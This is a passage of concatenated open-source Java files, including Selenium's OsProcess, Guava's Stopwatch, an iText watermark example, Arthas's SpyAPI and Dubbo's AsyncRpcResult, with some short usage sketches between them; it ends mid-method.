private final org.apache.commons.exec.CommandLine cl;
private final Map<String, String> env = new ConcurrentHashMap<>();
public OsProcess(String executable, String... args) {
String actualExe = new ExecutableFinder().find(executable);
Require.state("Actual executable", actualExe)
.nonNull("Unable to find executable for: %s", executable);
cl = new org.apache.commons.exec.CommandLine(actualExe);
cl.addArguments(args, false);
}
public void setEnvironmentVariable(String name, String value) {
if (name == null) {
throw new IllegalArgumentException("Cannot have a null environment variable name!");
}
if (value == null) {
throw new IllegalArgumentException(
"Cannot have a null value for environment variable " + name);
}
env.put(name, value);
}
public Map<String, String> getEnvironment() {
return unmodifiableMap(new HashMap<>(env));
}
private Map<String, String> getMergedEnv() {
HashMap<String, String> newEnv = new HashMap<>(System.getenv());
newEnv.putAll(env);
return newEnv;
}
private ByteArrayInputStream getInputStream() {
return allInput != null
? new ByteArrayInputStream(allInput.getBytes(Charset.defaultCharset()))
: null;
}
public void executeAsync() {
try {
final OutputStream outputStream = getOutputStream();
executeWatchdog.reset();
executor.setWatchdog(executeWatchdog);
streamHandler = new PumpStreamHandler(outputStream, outputStream, getInputStream());
executor.setStreamHandler(streamHandler);
executor.execute(cl, getMergedEnv(), handler);
} catch (IOException e) {
throw new WebDriverException(e);
}
}
public boolean waitForProcessStarted(long duration, TimeUnit unit) {
return executeWatchdog.waitForProcessStarted(duration, unit);
}
private OutputStream getOutputStream() {
return drainTo == null ? inputOut : new MultiOutputStream(inputOut, drainTo);
}
public int destroy() {
SeleniumWatchDog watchdog = executeWatchdog;
if (watchdog.waitForProcessStarted(2, TimeUnit.MINUTES)) {
// I literally have no idea why we don't try and kill the process nicely on Windows. If you do,
// answers on the back of a postcard to SeleniumHQ, please.
if (!Platform.getCurrent().is(WINDOWS)) {
watchdog.destroyProcess();
watchdog.waitForTerminationAfterDestroy(2, SECONDS);
}
if (isRunning()) {
watchdog.destroyHarder();
watchdog.waitForTerminationAfterDestroy(1, SECONDS);
}
} else {
LOG.warning("Tried to destory a process which never started.");
}
// Make a best effort to drain the streams.
if (streamHandler != null) {
// Stop trying to read the output stream so that we don't race with the stream being closed
// when the process is destroyed.
streamHandler.setStopTimeout(2000);
try {
streamHandler.stop();
} catch (IOException e) {
// Ignore and destroy the process anyway.
LOG.log(
Level.INFO,
"Unable to drain process streams. Ignoring but the exception being swallowed follows.",
e);
}
}
if (!isRunning()) {
return getExitCode();
}
LOG.severe(String.format("Unable to kill process %s", watchdog.process));
int exitCode = -1;
executor.setExitValue(exitCode);
return exitCode;
}
public void waitFor() throws InterruptedException {
handler.waitFor();
}
public void waitFor(long timeout) throws InterruptedException {
long until = System.currentTimeMillis() + timeout;
boolean timedOut = true;
while (System.currentTimeMillis() < until) {
if (Thread.interrupted()) {
throw new InterruptedException();
}
if (handler.hasResult()) {
timedOut = false;
break;
}
Thread.sleep(50);
}
if (timedOut) {
throw new TimeoutException(
String.format("Process timed out after waiting for %d ms.", timeout));
}
// Wait until syserr and sysout have been read
}
public boolean isRunning() {
return !handler.hasResult();
}
public int getExitCode() {
if (isRunning()) {
throw new IllegalStateException("Cannot get exit code before executing command line: " + cl);
}
return handler.getExitValue();
}
public void checkForError() {
if (handler.getException() != null) {
LOG.severe(handler.getException().toString());
}
}
public String getStdOut() {
return inputOut.toString();
}
public void setInput(String allInput) {
this.allInput = allInput;
}
public void setWorkingDirectory(File workingDirectory) {
executor.setWorkingDirectory(workingDirectory);
}
@Override
public String toString() {
return cl.toString() + "[ " + env + "]";
}
public void copyOutputTo(OutputStream out) {
drainTo = out;
}
class SeleniumWatchDog extends ExecuteWatchdog {
private volatile Process process;
private volatile boolean starting = true;
SeleniumWatchDog(long timeout) {
super(timeout);
}
@Override
public synchronized void start(Process process) {
this.process = process;
starting = false;
super.start(process);
}
public void reset() {
starting = true;
}
private boolean waitForProcessStarted(long duration, TimeUnit unit) {
long end = System.currentTimeMillis() + unit.toMillis(duration);
while (starting && System.currentTimeMillis() < end) {
try {
Thread.sleep(50);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
throw new WebDriverException(e);
}
}
return !starting;
}
private void waitForTerminationAfterDestroy(int duration, TimeUnit unit) {
long end = System.currentTimeMillis() + unit.toMillis(duration);
while (isRunning() && System.currentTimeMillis() < end) {
try {
Thread.sleep(50);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
throw new WebDriverException(e);
}
}
}
private void destroyHarder() {
try {
Process awaitFor = this.process.destroyForcibly();
awaitFor.waitFor(10, SECONDS);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
throw new RuntimeException(e);
}
}
}
}
| SeleniumHQ/selenium | java/src/org/openqa/selenium/os/OsProcess.java |
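A rough usage sketch for the deprecated helper above; because OsProcess is package-private, this assumes the caller sits in the same org.openqa.selenium.os package, and the echoed command is purely illustrative.
package org.openqa.selenium.os;

class OsProcessDemo {
    public static void main(String[] args) throws InterruptedException {
        OsProcess process = new OsProcess("echo", "hello");
        process.executeAsync();

        // Wait up to five seconds for completion, then read the captured output and exit code.
        process.waitFor(5000);
        System.out.println(process.getStdOut());
        System.out.println("exit code: " + process.getExitCode());
    }
}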
1,006 | package mindustry.world.meta;
/** Environmental flags for different types of locations. */
public class Env{
public static final int
//is on a planet
terrestrial = 1,
//is in space, no atmosphere
space = 1 << 1,
//is underwater, on a planet
underwater = 1 << 2,
//has spores
spores = 1 << 3,
//has a scorching env effect
scorching = 1 << 4,
//has oil reservoirs
groundOil = 1 << 5,
//has water reservoirs
groundWater = 1 << 6,
//has oxygen in the atmosphere
oxygen = 1 << 7,
//all attributes combined, only used for bitmasking purposes
any = 0xffffffff,
//no attributes (0)
none = 0;
}
| Anuken/Mindustry | core/src/mindustry/world/meta/Env.java |
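A small sketch of how these flags are typically combined and tested with bitwise operations; the envFlags value below is made up for illustration.
import mindustry.world.meta.Env;

public class EnvDemo {
    public static void main(String[] args) {
        // A hypothetical location: on a planet, with oxygen and ground water.
        int envFlags = Env.terrestrial | Env.oxygen | Env.groundWater;

        // A bitwise AND checks whether a particular attribute is present.
        System.out.println("terrestrial? " + ((envFlags & Env.terrestrial) != 0)); // true
        System.out.println("underwater?  " + ((envFlags & Env.underwater) != 0));  // false

        // Env.any matches every flag; Env.none matches nothing.
        System.out.println((envFlags & Env.any) == envFlags); // true
    }
}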
1,007 | package com.baeldung.iTextPDF;
import static com.itextpdf.layout.properties.TextAlignment.CENTER;
import static com.itextpdf.layout.properties.VerticalAlignment.TOP;
import static java.lang.Math.PI;
import java.io.File;
import java.io.IOException;
import com.itextpdf.io.font.constants.StandardFonts;
import com.itextpdf.kernel.font.PdfFont;
import com.itextpdf.kernel.font.PdfFontFactory;
import com.itextpdf.kernel.geom.PageSize;
import com.itextpdf.kernel.pdf.PdfDocument;
import com.itextpdf.kernel.pdf.PdfPage;
import com.itextpdf.kernel.pdf.PdfReader;
import com.itextpdf.kernel.pdf.PdfWriter;
import com.itextpdf.kernel.pdf.canvas.PdfCanvas;
import com.itextpdf.kernel.pdf.extgstate.PdfExtGState;
import com.itextpdf.layout.Document;
import com.itextpdf.layout.element.Paragraph;
import com.itextpdf.layout.element.Text;
public class StoryTime {
public static final String OUTPUT_FILE = "output/aliceupdated.pdf";
public String alice = " Alice was a curious young girl who one day stumbled upon a strange, talking rabbit." + " The rabbit, in a hurry, invited Alice to follow him down a rabbit hole."
+ "Alice, not one to turn down an adventure, eagerly followed the rabbit and found herself tumbling down a long, dark tunnel.As she fell, Alice passed through a small door and into a fantastical world filled with talking animals and peculiar characters."
+ "She met the Cheshire Cat, who seemed to appear and disappear at will, and the Mad Hatter, who invited her to a tea party."
+ "Alice also encountered the tyrannical Queen of Hearts, who was quick to anger and ordered the beheading of anyone who crossed her."
+ "Despite the dangers, Alice remained determined to find her way home and eventually stumbled upon the key to the door that would take her back to the real world."
+ " As Alice stepped through the door and back into reality, she couldn't help but wonder if it had all been a dream. But the memories of her adventures in Wonderland stayed with her forever, and she often found herself longing to return to that strange and magical place.";
public String paul = " Paulinho is a Brazilian professional footballer who currently plays as a midfielder for Guangzhou Evergrande Taobao in the Chinese Super League."
+ "He has also played for several top clubs around the world, including Barcelona, Tottenham Hotspur, and Guangzhou Evergrande. Paulinho has represented Brazil at the international level and has won several accolades throughout his career, including the Copa America and the Chinese Super League title."
+ "He is known for his strong work ethic and powerful offensive play.";
public static void main(String[] args) throws IOException {
File file = new File(OUTPUT_FILE);
file.getParentFile()
.mkdirs();
// new StoryTime().createPdf();
new StoryTime().addWatermarkToExistingPdf();
}
public void createPdf() throws IOException {
StoryTime storyTime = new StoryTime();
String waterMark = "CONFIDENTIAL";
PdfWriter writer = new PdfWriter(storyTime.OUTPUT_FILE);
PdfDocument pdf = new PdfDocument(writer);
try (Document document = new Document(pdf)) {
document.add(new Paragraph(storyTime.alice).setFont(PdfFontFactory.createFont(StandardFonts.TIMES_ROMAN)));
document.add(new Paragraph(storyTime.paul));
Paragraph paragraph = storyTime.createWatermarkParagraph(waterMark);
for (int i = 1; i <= document.getPdfDocument()
.getNumberOfPages(); i++) {
storyTime.addWatermarkToPage(document, i, paragraph, 0f);
}
}
}
public void addWatermarkToExistingPdf() throws IOException {
StoryTime storyTime = new StoryTime();
String outputPdf = "output/aliceupdated.pdf";
String watermark = "CONFIDENTIAL";
try (PdfDocument pdfDocument = new PdfDocument(new PdfReader("output/alicepaulwithoutwatermark.pdf"), new PdfWriter(outputPdf))) {
Document document = new Document(pdfDocument);
Paragraph paragraph = storyTime.createWatermarkParagraph(watermark);
PdfExtGState transparentGraphicState = new PdfExtGState().setFillOpacity(0.5f);
for (int i = 1; i <= document.getPdfDocument()
.getNumberOfPages(); i++) {
storyTime.addWatermarkToExistingPage(document, i, paragraph, transparentGraphicState, 0f);
}
}
}
public Paragraph createWatermarkParagraph(String watermark) throws IOException {
PdfFont font = PdfFontFactory.createFont(StandardFonts.HELVETICA);
Text text = new Text(watermark);
text.setFont(font);
text.setFontSize(56);
text.setOpacity(0.5f);
return new Paragraph(text);
}
public void addWatermarkToPage(Document document, int pageIndex, Paragraph paragraph, float verticalOffset) {
PdfPage pdfPage = document.getPdfDocument()
.getPage(pageIndex);
PageSize pageSize = (PageSize) pdfPage.getPageSizeWithRotation();
float x = (pageSize.getLeft() + pageSize.getRight()) / 2;
float y = (pageSize.getTop() + pageSize.getBottom()) / 2;
float xOffset = 100f / 2;
float rotationInRadians = (float) (PI / 180 * 45f);
document.showTextAligned(paragraph, x - xOffset, y + verticalOffset, pageIndex, CENTER, TOP, rotationInRadians);
}
public void addWatermarkToExistingPage(Document document, int pageIndex, Paragraph paragraph, PdfExtGState graphicState, float verticalOffset) {
PdfDocument pdfDoc = document.getPdfDocument();
PdfPage pdfPage = pdfDoc.getPage(pageIndex);
PageSize pageSize = (PageSize) pdfPage.getPageSizeWithRotation();
float x = (pageSize.getLeft() + pageSize.getRight()) / 2;
float y = (pageSize.getTop() + pageSize.getBottom()) / 2;
PdfCanvas over = new PdfCanvas(pdfDoc.getPage(pageIndex));
over.saveState();
over.setExtGState(graphicState);
float xOffset = 100f / 2;
float rotationInRadians = (float) (PI / 180 * 45f);
document.showTextAligned(paragraph, x - xOffset, y + verticalOffset, pageIndex, CENTER, TOP, rotationInRadians);
document.flush();
over.restoreState();
over.release();
}
}
| eugenp/tutorials | libraries-files/src/main/java/com/baeldung/iTextPDF/StoryTime.java |
1,008 | /*
* Copyright (C) 2008 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.base;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.base.Preconditions.checkState;
import static java.util.concurrent.TimeUnit.DAYS;
import static java.util.concurrent.TimeUnit.HOURS;
import static java.util.concurrent.TimeUnit.MICROSECONDS;
import static java.util.concurrent.TimeUnit.MILLISECONDS;
import static java.util.concurrent.TimeUnit.MINUTES;
import static java.util.concurrent.TimeUnit.NANOSECONDS;
import static java.util.concurrent.TimeUnit.SECONDS;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.J2ktIncompatible;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import com.google.j2objc.annotations.J2ObjCIncompatible;
import java.time.Duration;
import java.util.concurrent.TimeUnit;
/**
* An object that accurately measures <i>elapsed time</i>: the measured duration between two
* successive readings of "now" in the same process.
*
* <p>In contrast, <i>wall time</i> is a reading of "now" as given by a method like
* {@link System#currentTimeMillis()}, best represented as an {@link java.time.Instant}. Such values
* <i>can</i> be subtracted to obtain a {@code Duration} (such as by {@code Duration.between}), but
* doing so does <i>not</i> give a reliable measurement of elapsed time, because wall time readings
* are inherently approximate, routinely affected by periodic clock corrections. Because this class
* (by default) uses {@link System#nanoTime}, it is unaffected by these changes.
*
* <p>Use this class instead of direct calls to {@link System#nanoTime} for two reasons:
*
* <ul>
* <li>The raw {@code long} values returned by {@code nanoTime} are meaningless and unsafe to use
* in any other way than how {@code Stopwatch} uses them.
* <li>An alternative source of nanosecond ticks can be substituted, for example for testing or
* performance reasons, without affecting most of your code.
* </ul>
*
* <p>The one downside of {@code Stopwatch} relative to {@link System#nanoTime()} is that {@code
* Stopwatch} requires object allocation and additional method calls, which can reduce the accuracy
* of the elapsed times reported. {@code Stopwatch} is still suitable for logging and metrics where
* reasonably accurate values are sufficient. In the uncommon case that you need to maximize
* accuracy, use {@code System.nanoTime()} directly instead.
*
* <p>Basic usage:
*
* <pre>{@code
* Stopwatch stopwatch = Stopwatch.createStarted();
* doSomething();
* stopwatch.stop(); // optional
*
* Duration duration = stopwatch.elapsed();
*
* log.info("time: " + stopwatch); // formatted string like "12.3 ms"
* }</pre>
*
* <p>The state-changing methods are not idempotent; it is an error to start or stop a stopwatch
* that is already in the desired state.
*
* <p>When testing code that uses this class, use {@link #createUnstarted(Ticker)} or {@link
* #createStarted(Ticker)} to supply a fake or mock ticker. This allows you to simulate any valid
* behavior of the stopwatch.
*
* <p><b>Note:</b> This class is not thread-safe.
*
* <p><b>Warning for Android users:</b> a stopwatch with default behavior may not continue to keep
* time while the device is asleep. Instead, create one like this:
*
* <pre>{@code
* Stopwatch.createStarted(
* new Ticker() {
* public long read() {
* return android.os.SystemClock.elapsedRealtimeNanos(); // requires API Level 17
* }
* });
* }</pre>
*
* @author Kevin Bourrillion
* @since 10.0
*/
@GwtCompatible(emulated = true)
@SuppressWarnings("GoodTime") // lots of violations
@ElementTypesAreNonnullByDefault
public final class Stopwatch {
private final Ticker ticker;
private boolean isRunning;
private long elapsedNanos;
private long startTick;
/**
* Creates (but does not start) a new stopwatch using {@link System#nanoTime} as its time source.
*
* @since 15.0
*/
public static Stopwatch createUnstarted() {
return new Stopwatch();
}
/**
* Creates (but does not start) a new stopwatch, using the specified time source.
*
* @since 15.0
*/
public static Stopwatch createUnstarted(Ticker ticker) {
return new Stopwatch(ticker);
}
/**
* Creates (and starts) a new stopwatch using {@link System#nanoTime} as its time source.
*
* @since 15.0
*/
public static Stopwatch createStarted() {
return new Stopwatch().start();
}
/**
* Creates (and starts) a new stopwatch, using the specified time source.
*
* @since 15.0
*/
public static Stopwatch createStarted(Ticker ticker) {
return new Stopwatch(ticker).start();
}
Stopwatch() {
this.ticker = Ticker.systemTicker();
}
Stopwatch(Ticker ticker) {
this.ticker = checkNotNull(ticker, "ticker");
}
/**
* Returns {@code true} if {@link #start()} has been called on this stopwatch, and {@link #stop()}
* has not been called since the last call to {@code start()}.
*/
public boolean isRunning() {
return isRunning;
}
/**
* Starts the stopwatch.
*
* @return this {@code Stopwatch} instance
* @throws IllegalStateException if the stopwatch is already running.
*/
@CanIgnoreReturnValue
public Stopwatch start() {
checkState(!isRunning, "This stopwatch is already running.");
isRunning = true;
startTick = ticker.read();
return this;
}
/**
* Stops the stopwatch. Future reads will return the fixed duration that had elapsed up to this
* point.
*
* @return this {@code Stopwatch} instance
* @throws IllegalStateException if the stopwatch is already stopped.
*/
@CanIgnoreReturnValue
public Stopwatch stop() {
long tick = ticker.read();
checkState(isRunning, "This stopwatch is already stopped.");
isRunning = false;
elapsedNanos += tick - startTick;
return this;
}
/**
* Sets the elapsed time for this stopwatch to zero, and places it in a stopped state.
*
* @return this {@code Stopwatch} instance
*/
@CanIgnoreReturnValue
public Stopwatch reset() {
elapsedNanos = 0;
isRunning = false;
return this;
}
private long elapsedNanos() {
return isRunning ? ticker.read() - startTick + elapsedNanos : elapsedNanos;
}
/**
* Returns the current elapsed time shown on this stopwatch, expressed in the desired time unit,
* with any fraction rounded down.
*
* <p><b>Note:</b> the overhead of measurement can be more than a microsecond, so it is generally
* not useful to specify {@link TimeUnit#NANOSECONDS} precision here.
*
* <p>It is generally not a good idea to use an ambiguous, unitless {@code long} to represent
* elapsed time. Therefore, we recommend using {@link #elapsed()} instead, which returns a
* strongly-typed {@code Duration} instance.
*
* @since 14.0 (since 10.0 as {@code elapsedTime()})
*/
public long elapsed(TimeUnit desiredUnit) {
return desiredUnit.convert(elapsedNanos(), NANOSECONDS);
}
/**
* Returns the current elapsed time shown on this stopwatch as a {@link Duration}. Unlike {@link
* #elapsed(TimeUnit)}, this method does not lose any precision due to rounding.
*
* @since 22.0
*/
@J2ktIncompatible
@GwtIncompatible
@J2ObjCIncompatible
public Duration elapsed() {
return Duration.ofNanos(elapsedNanos());
}
/** Returns a string representation of the current elapsed time. */
@Override
public String toString() {
long nanos = elapsedNanos();
TimeUnit unit = chooseUnit(nanos);
double value = (double) nanos / NANOSECONDS.convert(1, unit);
// Too bad this functionality is not exposed as a regular method call
return Platform.formatCompact4Digits(value) + " " + abbreviate(unit);
}
private static TimeUnit chooseUnit(long nanos) {
if (DAYS.convert(nanos, NANOSECONDS) > 0) {
return DAYS;
}
if (HOURS.convert(nanos, NANOSECONDS) > 0) {
return HOURS;
}
if (MINUTES.convert(nanos, NANOSECONDS) > 0) {
return MINUTES;
}
if (SECONDS.convert(nanos, NANOSECONDS) > 0) {
return SECONDS;
}
if (MILLISECONDS.convert(nanos, NANOSECONDS) > 0) {
return MILLISECONDS;
}
if (MICROSECONDS.convert(nanos, NANOSECONDS) > 0) {
return MICROSECONDS;
}
return NANOSECONDS;
}
private static String abbreviate(TimeUnit unit) {
switch (unit) {
case NANOSECONDS:
return "ns";
case MICROSECONDS:
return "\u03bcs"; // μs
case MILLISECONDS:
return "ms";
case SECONDS:
return "s";
case MINUTES:
return "min";
case HOURS:
return "h";
case DAYS:
return "d";
default:
throw new AssertionError();
}
}
}
| google/guava | guava/src/com/google/common/base/Stopwatch.java |
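A short sketch of the fake-ticker testing pattern the class documentation above recommends; FakeTicker and its fixed 10 ms step per read are inventions of this example, not part of Guava.
import com.google.common.base.Stopwatch;
import com.google.common.base.Ticker;
import java.util.concurrent.TimeUnit;

public class StopwatchDemo {
    // A deterministic ticker that pretends 10 ms pass on every reading, handy for tests.
    static final class FakeTicker extends Ticker {
        private long nanos;

        @Override
        public long read() {
            nanos += TimeUnit.MILLISECONDS.toNanos(10);
            return nanos;
        }
    }

    public static void main(String[] args) {
        Stopwatch stopwatch = Stopwatch.createStarted(new FakeTicker());
        // ... code under test would run here ...
        stopwatch.stop();
        System.out.println(stopwatch.elapsed(TimeUnit.MILLISECONDS) + " ms"); // 10 ms with this fake ticker
    }
}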
1,009 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.ingest;
import org.elasticsearch.common.settings.Setting;
import org.elasticsearch.core.TimeValue;
public final class IngestSettings {
private IngestSettings() {
// utility class
}
public static final Setting<TimeValue> GROK_WATCHDOG_INTERVAL = Setting.timeSetting(
"ingest.grok.watchdog.interval",
TimeValue.timeValueSeconds(1),
Setting.Property.NodeScope
);
public static final Setting<TimeValue> GROK_WATCHDOG_MAX_EXECUTION_TIME = Setting.timeSetting(
"ingest.grok.watchdog.max_execution_time",
TimeValue.timeValueSeconds(1),
Setting.Property.NodeScope
);
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/ingest/IngestSettings.java |
1,010 | package java.arthas;
/**
* <pre>
* What is an adviceId? It is an id that a trace/monitor/watch command can map onto, for example a specific method of a class; its enter/end/exception events share a single id, and once assigned it is never reassigned.
*
* Likewise, once a method is traced it also gets an adviceId, and all invokes inside that method are handled uniformly under that one adviceId. But how should ids be assigned if different invokes are matched??
* That seems a bit difficult...
*
* Essentially, every place where instrumentation can be inserted is classified; but how should they be classified?? Or does the same kind of match correspond to the same kind of adviceId?
*
* For example, the input has a class and a method, which are fixed, a certain line number, or a certain
*
* Instrumentation inserted by AOP is called an adviceId, while instrumentation inserted by a command is called a ListenerId?
*
*
*
* </pre>
*
* @author hengyunabc
*
*/
public class SpyAPI {
public static final AbstractSpy NOPSPY = new NopSpy();
private static volatile AbstractSpy spyInstance = NOPSPY;
public static volatile boolean INITED;
public static AbstractSpy getSpy() {
return spyInstance;
}
public static void setSpy(AbstractSpy spy) {
spyInstance = spy;
}
public static void setNopSpy() {
setSpy(NOPSPY);
}
public static boolean isNopSpy() {
return NOPSPY == spyInstance;
}
public static void init() {
INITED = true;
}
public static boolean isInited() {
return INITED;
}
public static void destroy() {
setNopSpy();
INITED = false;
}
public static void atEnter(Class<?> clazz, String methodInfo, Object target, Object[] args) {
spyInstance.atEnter(clazz, methodInfo, target, args);
}
public static void atExit(Class<?> clazz, String methodInfo, Object target, Object[] args,
Object returnObject) {
spyInstance.atExit(clazz, methodInfo, target, args, returnObject);
}
public static void atExceptionExit(Class<?> clazz, String methodInfo, Object target,
Object[] args, Throwable throwable) {
spyInstance.atExceptionExit(clazz, methodInfo, target, args, throwable);
}
public static void atBeforeInvoke(Class<?> clazz, String invokeInfo, Object target) {
spyInstance.atBeforeInvoke(clazz, invokeInfo, target);
}
public static void atAfterInvoke(Class<?> clazz, String invokeInfo, Object target) {
spyInstance.atAfterInvoke(clazz, invokeInfo, target);
}
public static void atInvokeException(Class<?> clazz, String invokeInfo, Object target, Throwable throwable) {
spyInstance.atInvokeException(clazz, invokeInfo, target, throwable);
}
public static abstract class AbstractSpy {
public abstract void atEnter(Class<?> clazz, String methodInfo, Object target,
Object[] args);
public abstract void atExit(Class<?> clazz, String methodInfo, Object target, Object[] args,
Object returnObject);
public abstract void atExceptionExit(Class<?> clazz, String methodInfo, Object target,
Object[] args, Throwable throwable);
public abstract void atBeforeInvoke(Class<?> clazz, String invokeInfo, Object target);
public abstract void atAfterInvoke(Class<?> clazz, String invokeInfo, Object target);
public abstract void atInvokeException(Class<?> clazz, String invokeInfo, Object target, Throwable throwable);
}
static class NopSpy extends AbstractSpy {
@Override
public void atEnter(Class<?> clazz, String methodInfo, Object target, Object[] args) {
}
@Override
public void atExit(Class<?> clazz, String methodInfo, Object target, Object[] args,
Object returnObject) {
}
@Override
public void atExceptionExit(Class<?> clazz, String methodInfo, Object target, Object[] args,
Throwable throwable) {
}
@Override
public void atBeforeInvoke(Class<?> clazz, String invokeInfo, Object target) {
}
@Override
public void atAfterInvoke(Class<?> clazz, String invokeInfo, Object target) {
}
@Override
public void atInvokeException(Class<?> clazz, String invokeInfo, Object target, Throwable throwable) {
}
}
}
| alibaba/arthas | spy/src/main/java/java/arthas/SpyAPI.java |
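A hedged sketch of registering a custom spy through the API above; LoggingSpy is an invented name, and the example assumes SpyAPI is reachable on the boot classpath, which Arthas normally arranges when it attaches to a JVM.
import java.arthas.SpyAPI;

public class SpyDemo {
    // A trivial spy that only reports method entry; the remaining callbacks stay empty.
    static class LoggingSpy extends SpyAPI.AbstractSpy {
        @Override
        public void atEnter(Class<?> clazz, String methodInfo, Object target, Object[] args) {
            System.out.println("enter: " + clazz.getName() + "#" + methodInfo);
        }
        @Override
        public void atExit(Class<?> clazz, String methodInfo, Object target, Object[] args, Object returnObject) { }
        @Override
        public void atExceptionExit(Class<?> clazz, String methodInfo, Object target, Object[] args, Throwable throwable) { }
        @Override
        public void atBeforeInvoke(Class<?> clazz, String invokeInfo, Object target) { }
        @Override
        public void atAfterInvoke(Class<?> clazz, String invokeInfo, Object target) { }
        @Override
        public void atInvokeException(Class<?> clazz, String invokeInfo, Object target, Throwable throwable) { }
    }

    public static void main(String[] args) {
        SpyAPI.setSpy(new LoggingSpy());
        SpyAPI.init();
        // Instrumented bytecode would normally emit calls like this one:
        SpyAPI.atEnter(SpyDemo.class, "main(String[])", null, args);
        SpyAPI.destroy(); // restores the no-op spy
    }
}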
1,011 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.dubbo.rpc;
import org.apache.dubbo.common.logger.Logger;
import org.apache.dubbo.common.logger.LoggerFactory;
import org.apache.dubbo.common.threadpool.ThreadlessExecutor;
import org.apache.dubbo.rpc.model.ConsumerMethodModel;
import java.util.Map;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.Executor;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import java.util.function.BiConsumer;
import java.util.function.Function;
import static org.apache.dubbo.common.utils.ReflectUtils.defaultReturn;
/**
 * This class represents an unfinished RPC call. It holds context information for the call, for example the RpcContext and Invocation,
 * so that when the call finishes and the result returns, it can guarantee all contexts are restored to the same state as when the call
 * was made, before any callback is invoked.
 * <p>
 * TODO: is it reasonable, or even correct, to keep a reference to Invocation?
 * <p>
 * As {@link Result} implements CompletionStage, {@link AsyncRpcResult} allows you to easily build an async filter chain whose status is
 * driven entirely by the state of the underlying RPC call.
 * <p>
 * AsyncRpcResult does not contain any concrete value (except the underlying value carried by the CompletableFuture); consider it a
 * status transfer node. {@link #getValue()} and {@link #getException()} are both inherited from the {@link Result} interface;
 * implementing them is mainly for compatibility, because many legacy {@link Filter} implementations are likely to call getValue directly.
*/
public class AsyncRpcResult implements Result {
private static final Logger logger = LoggerFactory.getLogger(AsyncRpcResult.class);
/**
 * RpcContext may already have been changed by the time the callback happens, for example when the same thread is used to execute
 * another RPC call. So we keep a reference to the current RpcContext instance and restore it before the callback is executed.
*/
private RpcContext storedContext;
private RpcContext storedServerContext;
private Executor executor;
private Invocation invocation;
private CompletableFuture<AppResponse> responseFuture;
public AsyncRpcResult(CompletableFuture<AppResponse> future, Invocation invocation) {
this.responseFuture = future;
this.invocation = invocation;
this.storedContext = RpcContext.getContext();
this.storedServerContext = RpcContext.getServerContext();
}
/**
 * Note that the return type of {@link #getValue} is the actual return type of the RPC method, not {@link AppResponse}.
*
* @return
*/
@Override
public Object getValue() {
return getAppResponse().getValue();
}
/**
 * A CompletableFuture can only be completed once, so trying to update the result of an already completed CompletableFuture has no
 * effect. To avoid this problem, we check the completion status of the future before updating its value.
 *
 * Note, however, that giving an uncompleted CompletableFuture a new value is subject to a race condition, because the background
 * thread watching the real result may also complete this CompletableFuture, so the value you intended to set can be lost.
*
* @param value
*/
@Override
public void setValue(Object value) {
try {
if (responseFuture.isDone()) {
responseFuture.get().setValue(value);
} else {
AppResponse appResponse = new AppResponse(invocation);
appResponse.setValue(value);
responseFuture.complete(appResponse);
}
} catch (Exception e) {
            // This should not happen during normal request processing.
logger.error("Got exception when trying to fetch the underlying result from AsyncRpcResult.");
throw new RpcException(e);
}
}
@Override
public Throwable getException() {
return getAppResponse().getException();
}
@Override
public void setException(Throwable t) {
try {
if (responseFuture.isDone()) {
responseFuture.get().setException(t);
} else {
AppResponse appResponse = new AppResponse(invocation);
appResponse.setException(t);
responseFuture.complete(appResponse);
}
} catch (Exception e) {
            // This should not happen during normal request processing.
logger.error("Got exception when trying to fetch the underlying result from AsyncRpcResult.");
throw new RpcException(e);
}
}
@Override
public boolean hasException() {
return getAppResponse().hasException();
}
public CompletableFuture<AppResponse> getResponseFuture() {
return responseFuture;
}
public void setResponseFuture(CompletableFuture<AppResponse> responseFuture) {
this.responseFuture = responseFuture;
}
public Result getAppResponse() {
try {
if (responseFuture.isDone()) {
return responseFuture.get();
}
} catch (Exception e) {
            // This should not happen during normal request processing.
logger.error("Got exception when trying to fetch the underlying result from AsyncRpcResult.");
throw new RpcException(e);
}
return createDefaultValue(invocation);
}
/**
 * This method always returns after waiting at most the configured timeout:
 * 1. if a value is returned before the timeout, it returns normally.
 * 2. if no value is returned within the timeout, a TimeoutException is thrown.
*
* @return
* @throws InterruptedException
* @throws ExecutionException
*/
@Override
public Result get() throws InterruptedException, ExecutionException {
if (executor != null && executor instanceof ThreadlessExecutor) {
ThreadlessExecutor threadlessExecutor = (ThreadlessExecutor) executor;
threadlessExecutor.waitAndDrain();
}
return responseFuture.get();
}
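    // Note: when the executor is a ThreadlessExecutor, waitAndDrain() above lets the calling
    // thread execute the queued response task itself instead of parking while a separate
    // consumer thread completes the future; the completed responseFuture is then read directly.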
@Override
public Result get(long timeout, TimeUnit unit) throws InterruptedException, ExecutionException, TimeoutException {
if (executor != null && executor instanceof ThreadlessExecutor) {
